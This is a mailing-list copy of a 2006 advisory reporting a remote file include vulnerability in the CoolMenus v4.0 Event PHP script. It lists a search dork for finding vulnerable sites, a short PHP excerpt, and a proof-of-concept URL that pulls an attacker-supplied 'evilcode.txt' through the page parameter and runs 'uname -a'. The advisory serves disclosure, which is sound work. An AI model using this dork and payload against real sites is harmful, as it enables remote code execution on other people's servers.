[Kurdish Security #3] CoolMenus Event Remote File Include Vulnerability (For PHP)

botan Fri, 28 Apr 2006 11:47:51 -0700

Original Advisory : 
http://kurdishsecurity.blogspot.com/2006/04/coolmenus-event-remote-file-include.html



#ColMenus Event Remote File Include Vulnerability#

#Website : http://coolmenus.dhtmlcentral.com/projects/coolmenus [Closed]

#Script : CoolMenus v4.0 Event Script

#Risk : High

#Class : Remote

#Greetz : B3g0k,Nistiman,Flot,Netqurd etc..

#d0rk : "/event/index.php?page=" 


I.



require("event_inc.php"); 

echo "Events"; 

$start = filectime($news); 

$jetzt = time(); 

$update = "$start"+"$timespan"; 

if($jetzt >= $update) 

{include("event_html.php");} 


II.


Proof of Concept:


http://www.site.com/[path]/event/index.php?page=evilcode.txt?&cmd=uname -a

[Kurdish Security #3] CoolMenus Event Remote File Include Vulnerability (For PHP)

Reply via email to